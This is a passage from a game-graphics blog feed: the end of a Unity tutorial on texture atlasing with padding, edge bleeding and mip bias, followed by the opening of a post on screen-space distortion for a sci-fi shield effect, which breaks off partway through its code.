<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">rect</span> <span class="o">=</span> <span class="n">packResults</span><span class="p">.</span><span class="n">rects</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">Texture2D</span> <span class="n">readableTex</span> <span class="o">=</span> <span class="n">null</span><span class="p">;</span>
<span class="c1">//load the image uncompressed</span>
<span class="n">string</span> <span class="n">fileURL</span> <span class="o">=</span> <span class="n">AssetDatabase</span><span class="p">.</span><span class="n">GetAssetPath</span><span class="p">(</span><span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="n">byte</span><span class="p">[]</span> <span class="n">imgBytes</span> <span class="o">=</span> <span class="n">File</span><span class="p">.</span><span class="n">ReadAllBytes</span><span class="p">(</span><span class="n">fileURL</span><span class="p">);</span>
<span class="n">readableTex</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Texture2D</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">1</span><span class="p">,</span><span class="n">TextureFormat</span><span class="p">.</span><span class="n">ARGB32</span><span class="p">,</span><span class="nb">false</span><span class="p">);</span>
<span class="n">readableTex</span><span class="p">.</span><span class="n">LoadImage</span><span class="p">(</span><span class="n">imgBytes</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">localPadding</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Min</span><span class="p">(</span><span class="n">padding</span><span class="p">,</span> <span class="n">readableTex</span><span class="p">.</span><span class="n">width</span> <span class="o">/</span><span class="mi">4</span><span class="p">);</span>
<span class="n">rect</span><span class="p">.</span><span class="n">x</span> <span class="o">+=</span> <span class="n">localPadding</span><span class="p">;</span>
<span class="n">rect</span><span class="p">.</span><span class="n">width</span> <span class="o">-=</span> <span class="n">localPadding</span><span class="o">*</span><span class="mi">2</span><span class="p">;</span>
<span class="n">rect</span><span class="p">.</span><span class="n">y</span> <span class="o">+=</span> <span class="n">localPadding</span><span class="p">;</span>
<span class="n">rect</span><span class="p">.</span><span class="n">height</span> <span class="o">-=</span> <span class="n">localPadding</span><span class="o">*</span><span class="mi">2</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">x</span> <span class="o"><</span> <span class="n">rect</span><span class="p">.</span><span class="n">width</span><span class="p">;</span> <span class="n">x</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">y</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">y</span> <span class="o"><</span> <span class="n">rect</span><span class="p">.</span><span class="n">height</span><span class="p">;</span> <span class="n">y</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Color</span> <span class="n">pixel</span> <span class="o">=</span> <span class="n">readableTex</span><span class="p">.</span><span class="n">GetPixelBilinear</span><span class="p">(</span><span class="n">x</span> <span class="o">/</span> <span class="n">rect</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">y</span> <span class="o">/</span> <span class="n">rect</span><span class="p">.</span><span class="n">height</span><span class="p">);</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">SetPixel</span><span class="p">((</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="n">x</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span><span class="n">y</span><span class="p">,</span> <span class="n">pixel</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Clamp</span><span class="p">;</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">Apply</span><span class="p">();</span>
<span class="p">}</span></code></pre></figure>
<p>Ok, now we’re talking!</p>
<p>Notice that we have a check in there to make sure that we never add so much padding that a texture is completely invisible on the atlas, or so much padding that the padded areas overlap.</p>
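<p>If the clamp is easier to see with numbers, here is a rough sketch of the same arithmetic in plain Python rather than Unity C#. The function name <code>inner_rect</code> and its tuple layout are made up for this illustration, and <code>tex_width</code> stands in for <code>readableTex.width</code>:</p>

```python
def inner_rect(x, y, width, height, padding, tex_width):
    """Shrink a packed rect by the clamped padding on every side."""
    # Same clamp as the packing loop: never use more than a quarter of the
    # texture's width as padding, so the padded borders can't swallow the rect.
    local_padding = min(padding, tex_width // 4)
    return (x + local_padding,
            y + local_padding,
            width - 2 * local_padding,
            height - 2 * local_padding)


# A 16px texture asked for 8px of padding only gets 4px on each side.
small = inner_rect(0, 0, 16, 16, padding=8, tex_width=16)

# A 256px texture has room for the full 8px.
large = inner_rect(0, 0, 256, 256, padding=8, tex_width=256)
```

<p>With the quarter-width clamp, the padding on both sides can never add up to more than half of the rect, which is why the texture always stays visible.</p>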
<h3 id="edge-bleeding">Edge Bleeding</h3>
<p>So this is great, and is going to make sure that (at least on the higher resolution mips), our textures aren’t going to bleed into each other. Unfortunately it means (at least right now), that they’ll instead pick up whatever value we clear our texture to. What we want to do next is to make sure that the areas that contain our padding are filled with the edge colour of the textures inside them. This is going to give us an atlas that looks something like this:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/paddedatlasedges.png" />
<br />
<br />
</div>
<p>To do this, the easiest way is to simply set the wrapMode of our readableTex to clamp and sample UVs outside of 0 to 1 for the padding regions. In code, this looks like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">packResults</span><span class="p">.</span><span class="n">textures</span><span class="p">.</span><span class="n">Count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//Some Code Omitted For Brevity</span>
<span class="n">readableTex</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Clamp</span><span class="p">;</span>
<span class="n">readableTex</span><span class="p">.</span><span class="n">LoadImage</span><span class="p">(</span><span class="n">imgByes</span><span class="p">);</span>
<span class="kt">int</span> <span class="n">localPadding</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Min</span><span class="p">(</span><span class="n">padding</span><span class="p">,</span> <span class="n">readableTex</span><span class="p">.</span><span class="n">width</span> <span class="o">/</span><span class="mi">4</span><span class="p">);</span>
<span class="n">Rect</span> <span class="n">innerRect</span> <span class="o">=</span> <span class="n">packResults</span><span class="p">.</span><span class="n">rects</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">innerRect</span><span class="p">.</span><span class="n">x</span> <span class="o">+=</span> <span class="n">localPadding</span><span class="p">;</span>
<span class="n">innerRect</span><span class="p">.</span><span class="n">y</span> <span class="o">+=</span> <span class="n">localPadding</span><span class="p">;</span>
<span class="n">innerRect</span><span class="p">.</span><span class="n">width</span> <span class="o">-=</span> <span class="n">localPadding</span><span class="o">*</span><span class="mi">2</span><span class="p">;</span>
<span class="n">innerRect</span><span class="p">.</span><span class="n">height</span> <span class="o">-=</span> <span class="n">localPadding</span><span class="o">*</span><span class="mi">2</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">x</span><span class="p">;</span> <span class="n">x</span> <span class="o"><</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">x</span> <span class="o">+</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">width</span><span class="p">;</span> <span class="n">x</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">y</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">y</span><span class="p">;</span> <span class="n">y</span> <span class="o"><</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">y</span> <span class="o">+</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">rect</span><span class="p">.</span><span class="n">height</span><span class="p">;</span> <span class="n">y</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">xSample</span> <span class="o">=</span> <span class="n">x</span> <span class="o">-</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">innerRect</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">ySample</span> <span class="o">=</span> <span class="n">y</span> <span class="o">-</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">innerRect</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="n">Color</span> <span class="n">pixel</span> <span class="o">=</span> <span class="n">readableTex</span><span class="p">.</span><span class="n">GetPixelBilinear</span><span class="p">(</span><span class="n">xSample</span> <span class="o">/</span> <span class="n">innerRect</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">ySample</span> <span class="o">/</span> <span class="n">innerRect</span><span class="p">.</span><span class="n">height</span><span class="p">);</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">SetPixel</span><span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">,</span> <span class="n">pixel</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">packedRects</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">innerRect</span><span class="p">;</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Clamp</span><span class="p">;</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">Apply</span><span class="p">();</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that we have to replace the rectangle in our packedRects array with the inset one (innerRect). Otherwise, when we use that UV rect, it will include the padding area around the texture, which is less than ideal.</p>
<p>Perfect! Now what about those areas that have no texture in them at all… they’re still going to be a problem when we start using lower resolution mips, so we need to fill them in too. What’s worked for me in the past is to visit every pixel, and if it isn’t contained in a UV rect, look along the horizontal and vertical axis until you find the closest pixel that is, and shade using that color.</p>
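<p>To see why clamping fills the padding with edge colours, here is a small standalone sketch in plain Python. It uses a nearest-pixel lookup instead of the bilinear filtering that GetPixelBilinear does, and <code>sample_clamped</code> is a hypothetical helper, not a Unity call:</p>

```python
def sample_clamped(pixels, u, v):
    """Nearest-pixel lookup with clamp addressing (no bilinear filtering)."""
    height = len(pixels)
    width = len(pixels[0])
    # Clamp addressing: any UV outside 0..1 is pulled back to the nearest edge.
    u = min(max(u, 0.0), 1.0)
    v = min(max(v, 0.0), 1.0)
    px = min(int(u * width), width - 1)
    py = min(int(v * height), height - 1)
    return pixels[py][px]


texture = [["A", "B"],
           ["C", "D"]]

# UVs to the left of the texture repeat the left edge pixel.
left_of_texture = sample_clamped(texture, -0.25, 0.0)

# UVs to the right of the texture repeat the right edge pixel.
right_of_texture = sample_clamped(texture, 1.25, 0.9)

# UVs inside 0..1 behave as usual.
inside = sample_clamped(texture, 0.75, 0.25)
```

<p>Every pixel in the padding region maps to a UV just outside 0 to 1, so it ends up with a copy of the nearest edge pixel.</p>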
<p>Your atlas will end up looking something like what I have below. For the purposes of this example, I shrank the rock texture in the above atlas to make some more space.</p>
<div align="center">
<img src="/images/post_images/2016-10-11/atlasedgebleedgaps.png" />
<br />
<br />
</div>
<p>The code changes to make this work are a bit more involved than before, so I’m going to go through each part instead of throwing all the code at you at once.</p>
<p>First, since we’re going to need to look up colours in our packed textures after they’ve been placed, we’re going to need to store the readable textures we create in an array that we can access later:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Texture2D</span><span class="p">[]</span> <span class="n">readables</span> <span class="o">=</span> <span class="k">new</span> <span class="n">Texture2D</span><span class="p">[</span><span class="n">textures</span><span class="p">.</span><span class="n">Length</span><span class="p">];</span></code></pre></figure>
<p>Then in the body of the packing loop, we need to assign the readable textures we create to this array:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">readables</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">readableTex</span><span class="p">;</span></code></pre></figure>
<p>So far so easy right? Now, after we get out of the packing loop, we need to add a second set of loops, which is going to iterate over all the pixels in our output atlas, and check if they are contained in any of our (unpadded) UV rects. If they aren’t, we’ll grab the texture in the one that’s closest and call GetPixelBilinear again:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">x</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">x</span> <span class="o"><</span> <span class="n">outAtlas</span><span class="p">.</span><span class="n">width</span><span class="p">;</span> <span class="o">++</span><span class="n">x</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">y</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">y</span> <span class="o"><</span> <span class="n">outAtlas</span><span class="p">.</span><span class="n">height</span><span class="p">;</span> <span class="o">++</span><span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">closestDist</span> <span class="o">=</span> <span class="kt">float</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="n">Color</span> <span class="n">c</span> <span class="o">=</span> <span class="n">Color</span><span class="p">.</span><span class="n">clear</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">r</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">r</span> <span class="o"><</span> <span class="n">packedRects</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="o">++</span><span class="n">r</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Rect</span> <span class="n">curRect</span> <span class="o">=</span> <span class="n">packedRects</span><span class="p">[</span><span class="n">r</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">curRect</span><span class="p">.</span><span class="n">Contains</span><span class="p">(</span><span class="k">new</span> <span class="n">Vector2</span><span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">)))</span>
<span class="p">{</span>
<span class="n">closestDist</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">float</span> <span class="n">d</span> <span class="o">=</span> <span class="n">DistanceToRect</span><span class="p">(</span><span class="n">curRect</span><span class="p">,</span> <span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">d</span> <span class="o"><</span> <span class="n">closestDist</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">closestDist</span> <span class="o">=</span> <span class="n">d</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">uvX</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">-</span> <span class="n">curRect</span><span class="p">.</span><span class="n">x</span><span class="p">)</span> <span class="o">/</span> <span class="n">curRect</span><span class="p">.</span><span class="n">width</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">uvY</span> <span class="o">=</span> <span class="p">(</span><span class="n">y</span> <span class="o">-</span> <span class="n">curRect</span><span class="p">.</span><span class="n">y</span><span class="p">)</span> <span class="o">/</span> <span class="n">curRect</span><span class="p">.</span><span class="n">height</span><span class="p">;</span>
<span class="n">c</span> <span class="o">=</span> <span class="n">readables</span><span class="p">[</span><span class="n">r</span><span class="p">].</span><span class="n">GetPixelBilinear</span><span class="p">(</span><span class="n">uvX</span><span class="p">,</span> <span class="n">uvY</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">closestDist</span> <span class="o">></span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">SetPixel</span><span class="p">(</span><span class="n">x</span><span class="p">,</span><span class="n">y</span><span class="p">,</span><span class="n">c</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">wrapMode</span> <span class="o">=</span> <span class="n">TextureWrapMode</span><span class="p">.</span><span class="n">Clamp</span><span class="p">;</span>
<span class="n">outAtlas</span><span class="p">.</span><span class="n">Apply</span><span class="p">();</span></code></pre></figure>
<p>Not the fastest code in the world, but it churns through filling in the space on an almost empty 2048x2048 texture in a few seconds on my laptop, so I’m calling it good enough for a build time tool. It’s important to make sure that you only call outAtlas.Apply() at the end of your function, as that’s the call that uploads the modified pixels to the GPU and it is very slow. If you call it inside a loop you’ll be waiting for a while.</p>
<p>The last bit of code we need is the body of the DistanceToRect function, which returns the squared distance from a given point to the edge of a rectangle (or 0 if the point is inside it). We only ever compare these values against each other, so there’s no need to take the square root:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">private</span> <span class="k">static</span> <span class="kt">float</span> <span class="nf">DistanceToRect</span><span class="p">(</span><span class="n">Rect</span> <span class="n">r</span><span class="p">,</span> <span class="kt">int</span> <span class="n">x</span><span class="p">,</span> <span class="kt">int</span> <span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">xDist</span> <span class="o">=</span> <span class="kt">float</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">yDist</span> <span class="o">=</span> <span class="kt">float</span><span class="p">.</span><span class="n">MaxValue</span><span class="p">;</span>
<span class="n">xDist</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Max</span><span class="p">(</span><span class="n">Mathf</span><span class="p">.</span><span class="n">Abs</span><span class="p">(</span><span class="n">x</span> <span class="o">-</span> <span class="n">r</span><span class="p">.</span><span class="n">center</span><span class="p">.</span><span class="n">x</span><span class="p">)</span> <span class="o">-</span> <span class="n">r</span><span class="p">.</span><span class="n">width</span> <span class="o">/</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">yDist</span> <span class="o">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="n">Max</span><span class="p">(</span><span class="n">Mathf</span><span class="p">.</span><span class="n">Abs</span><span class="p">(</span><span class="n">y</span> <span class="o">-</span> <span class="n">r</span><span class="p">.</span><span class="n">center</span><span class="p">.</span><span class="n">y</span><span class="p">)</span> <span class="o">-</span> <span class="n">r</span><span class="p">.</span><span class="n">height</span> <span class="o">/</span> <span class="mi">2</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">return</span> <span class="n">xDist</span> <span class="o">*</span> <span class="n">xDist</span> <span class="o">+</span> <span class="n">yDist</span> <span class="o">*</span> <span class="n">yDist</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
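<p>For a quick sanity check of that math, here is the same calculation as a standalone Python sketch. The rectangle is passed as plain numbers instead of a Unity Rect, and the function name is only for illustration:</p>

```python
def distance_to_rect_squared(rx, ry, rw, rh, x, y):
    """Squared distance from (x, y) to the rect, 0 if the point is inside."""
    center_x = rx + rw / 2
    center_y = ry + rh / 2
    # Distance past the rect's edge on each axis, clamped to 0 when the
    # point lies within the rect's extent on that axis.
    x_dist = max(abs(x - center_x) - rw / 2, 0)
    y_dist = max(abs(y - center_y) - rh / 2, 0)
    return x_dist * x_dist + y_dist * y_dist


rect = (10, 10, 20, 20)  # x, y, width, height: covers 10..30 on both axes

inside = distance_to_rect_squared(*rect, 15, 15)    # within the rect
beside = distance_to_rect_squared(*rect, 33, 15)    # 3px right of the edge
diagonal = distance_to_rect_squared(*rect, 33, 34)  # 3px right, 4px above
```

<p>The point beside the rect comes out as 9 (3 squared), and the diagonal one as 25 (3 squared plus 4 squared), which is all we need to pick the closest rect.</p>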
<h2 id="wrapping-things-up">Wrapping Things Up</h2>
<p>What we have now is a perfectly good Texture Atlasser! With padding and edge bleed, the mips you care most about (the higher resolution ones) are likely going to be completely unblemished. If anything here wasn’t clear, or you just want some source, it’s available at the end of this post.</p>
<p>However, there’s one more thing you can do to make this really shine. If you’re following along, you may have realized that even with all of this set up (and padding cranked), there isn’t really much you can do about the smallest mip level. There’s just too little resolution to reasonably store information about different textures, and no matter how much padding you add, you still end up with some mipping artifacts:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/atlasnomipbias.png" />
<font size="1">I had to zoom in on my image to highlight the artifacts, forgive the low resolution</font>
<br />
<br />
</div>
<p>To get around this, you can set the mip bias of the texture to a negative number, so that it always samples from a higher resolution mip level than it otherwise would. This will make your texture sharper, and prevent it from hitting the lowest mip level (assuming you bias it to -1). This obviously has minor performance implications, but assuming you have the wiggle room to weather them, it’s going to get you a much nicer looking scene.</p>
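<p>As a rough mental model of what the bias does, here is a small Python sketch. It is a simplification: a real GPU picks a fractional mip level from screen-space derivatives and then adds the bias, and the helper names below are made up for this example:</p>

```python
def mip_count(width, height):
    """Number of levels in a full mip chain, down to 1x1."""
    return max(width, height).bit_length()


def biased_level(level, bias, count):
    """Apply a mip bias to a level, clamped to the levels that exist."""
    return min(max(level + bias, 0), count - 1)


count = mip_count(2048, 2048)   # levels 0 (2048px) through 11 (1px)
smallest = count - 1

# With a bias of -1, a request for the 1px level lands one level higher.
with_bias = biased_level(smallest, -1.0, count)
size_with_bias = 2048 >> int(with_bias)
```

<p>In this model a 2048x2048 atlas never samples its 1x1 level once the bias is -1. The smallest level it can reach is the 2x2 one.</p>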
<p>The code to do this is a little odd, because Unity doesn’t really let you control anything about your mip maps unless you do it when the texture is imported. That’s surprising, given that you can write other metadata (like we did with our wrapMode earlier) before you save the asset to disk, but regardless, we’re going to need to write a custom texture importer to set our mip bias.</p>
<p>Custom asset importers are pretty easy to build with Unity. Here’s one that gets us the mip bias value we want on our input atlasses:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">class</span> <span class="nc">AtlasImporter</span> <span class="o">:</span> <span class="n">AssetPostprocessor</span>
<span class="p">{</span>
<span class="k">private</span> <span class="kt">void</span> <span class="n">OnPostprocessTexture</span><span class="p">(</span><span class="n">Texture2D</span> <span class="n">import</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">assetPath</span><span class="p">.</span><span class="n">Contains</span><span class="p">(</span><span class="s">"Atlasses"</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">import</span><span class="p">.</span><span class="n">mipMapBias</span> <span class="o">=</span> <span class="o">-</span><span class="mf">1.0</span><span class="n">f</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Make sure to put this in a script located in an Editor folder in your project, or the code won’t get run. Assuming you’ve done all that correctly, when you regenerate (or reimport) your atlas, those far away seams should be completely cleared up:</p>
<div align="center">
<img src="/images/post_images/2016-10-11/atlasmipbias.png" />
<br />
<br />
</div>
<p>You’ll notice that the texture data present in the image changes when I change the mip bias. This is expected, because we are literally sampling from a different, higher resolution mip map in the second screenshot, so things aren’t going to look 100% identical to when we didn’t have the bias set.</p>
<p>With that done, we have our atlasser! It’s worth noting that this won’t solve all your problems if the input textures to your atlasser aren’t power-of-two sized. If yours aren’t, you’ll want to generate your own mips in addition to everything we’ve talked about here. I recommend not letting an NPOT texture get in an atlas meant for 3D content, but if you for some reason must do that, more info is available <a href="http://http.download.nvidia.com/developer/NVTextureSuite/Atlas_Tools/Texture_Atlas_Whitepaper.pdf">from NVidia</a>.</p>
<p>Whew, this covered a lot of ground! In case you weren’t following along at home, all the code that I’ve talked about here has been <a href="https://gist.github.com/khalladay/0cc73bfe3445a862a6e5a7faeec17322">uploaded to github</a>.</p>
<p>If you have any questions about this, or spot a mistake, shoot me an email, or a twitter message. I check twitter…sorta…not frequently, but I will eventually see it if you send me something there. My email / twitter is available in the sidebar. Have a good one!</p>
Screen Space Distortion and a Sci-fi Shield Effect2016-01-15T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2016/01/15/Screen-Space-Distortion<p>Sometimes inspiration comes from the weirdest places. I was idly browsing reddit after work a while ago and stumbled onto this post by user <a href="http://reddit.com/u/Guillaume_Langis">Guillaume_Langis</a>. It was a gif of a shield effect that they had created for their game <a href="http://projectwarfleet.blogspot.ca/">Warfleet</a>. The comments section on that post was filled (predictably) with users asking how the effect was done, and Guillaume ended up actually posting the C# and shader source online for people to play with, which is awesome (thanks!)</p>
<p>The effect already looks great, but when I think of a sci-fi shield I think of distortion and wobbling “force field” style effects. That’s what I’m going to add in this article, turning the shield effect into this:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/spaceshipteaser.gif" />
<br />
<br />
</div>
<h2>Some Initial Housekeeping</h2>
<p>The space ship in these screen shots is available free on the asset store, and the texture I threw on the shield was just one I got by googling for “plasma texture.” I also took the liberty of optimizing the original effect which was posted to reddit. You can find the original code <a href="https://www.dropbox.com/s/y083i4mz0f4n81o/Shield%20Effect.zip?dl=0">here</a>.</p>
<p>All the scripts and shaders used in this post will be available at the end of the article, but to start with, I’ve uploaded a unity project with a scene set up with this effect ready to go so that it’s easy to follow along <a href="https://drive.google.com/folderview?id=0B85AH3b17yxpVzZkbkM1bjdDNU0&usp=sharing">here</a>. This article is about how to build a distortion effect, not about how to create the shield effect, so that part won’t be explained, but it will be a lot easier to follow this post if you have a project set up with it. I haven’t included the space ship or space textures from the screenshots because I didn’t make those, but you should be able to get them yourself pretty easily. As we go through this post, my screenshots will alternate between what the sample scene should look like and what it looks like with real assets.</p>
<p>Ok, now that that’s out of the way, time to get cracking.</p>
<h2>The Basics of Screen Space Distortion</h2>
<p>Let’s start by talking about what exactly a Screen Space Distortion effect is. You’ve definitely seen the effect before: it’s used to render everything from refraction to heat haze to trippy drug sequences in games, and it’s actually really simple.</p>
<p>At its core, all the effect requires is that you render your main camera (the one which will show the distortion) to a texture instead of rendering it directly to the framebuffer, then blit it (draw it) to the framebuffer from that texture using a shader which offsets the UVs used to sample your main camera texture.</p>
<p>A really simple example might look something like this:</p>
<div align="center">
<img src="/images/post_images/2016-1-15/warp.png" />
<br />
<br />
</div>
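<p>If it helps to see the idea without any engine code, here is a rough CPU-side sketch in plain Python. It treats a list of rows as the “main camera texture” and uses a sine wave offset (frequency 100, amplitude 0.01) as the distortion. The function names are made up for this illustration, and a real implementation does this per pixel in a shader:</p>

```python
import math


def distort_uv(u, v, frequency=100.0, amplitude=0.01):
    """Shift u sideways by a small sine wave driven by v; v is untouched."""
    return (u + math.sin(v * frequency) * amplitude, v)


def blit_distorted(source):
    """Copy source to a new image, sampling each pixel at a distorted UV."""
    height = len(source)
    width = len(source[0])
    out = []
    for y in range(height):
        row = []
        for x in range(width):
            # UV of this output pixel's center, then the distorted lookup.
            u, v = distort_uv((x + 0.5) / width, (y + 0.5) / height)
            sx = min(max(int(u * width), 0), width - 1)
            sy = min(max(int(v * height), 0), height - 1)
            row.append(source[sy][sx])
        out.append(row)
    return out


# Each row holds a single value, so a purely horizontal shift changes nothing.
stripes = [[y] * 4 for y in range(4)]
distorted = blit_distorted(stripes)
```

<p>Because only the horizontal coordinate is offset, each output row still samples from the same source row. The pixels just slide left and right by up to 1% of the image width.</p>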
<p>Of course, there isn’t a one size fits all way to modify the UV coordinates, which is where the fun starts. But before we get there, let’s walk through the code required to make the trivial example above actually functional.</p>
<p>First, we need to get our main camera rendering to a secondary texture. Usually when you want a camera to render to a texture in Unity you use the targetTexture attribute of the camera component, but not today. Unity is a bit quirky here, but I’ve found in practice that you can’t blit a texture to the framebuffer if that texture is currently a camera’s target texture. Since we’re going to be blitting this texture to the framebuffer as we apply our post effect, we need to use a different bit of API:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="k">class</span> <span class="nc">ScreenSpaceDistortionEffect</span> <span class="o">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="n">RenderTexture</span> <span class="n">screenRT</span><span class="p">;</span>
<span class="n">Camera</span> <span class="n">mainCam</span><span class="p">;</span>
<span class="kt">void</span> <span class="n">Awake</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">screenRT</span> <span class="o">=</span> <span class="k">new</span> <span class="n">RenderTexture</span><span class="p">(</span><span class="n">Screen</span><span class="p">.</span><span class="n">width</span><span class="p">,</span> <span class="n">Screen</span><span class="p">.</span><span class="n">height</span><span class="p">,</span> <span class="mi">16</span><span class="p">,</span> <span class="n">RenderTextureFormat</span><span class="p">.</span><span class="n">Default</span><span class="p">);</span>
<span class="n">mainCam</span> <span class="o">=</span> <span class="n">GetComponent</span><span class="o"><</span><span class="n">Camera</span><span class="o">></span><span class="p">();</span>
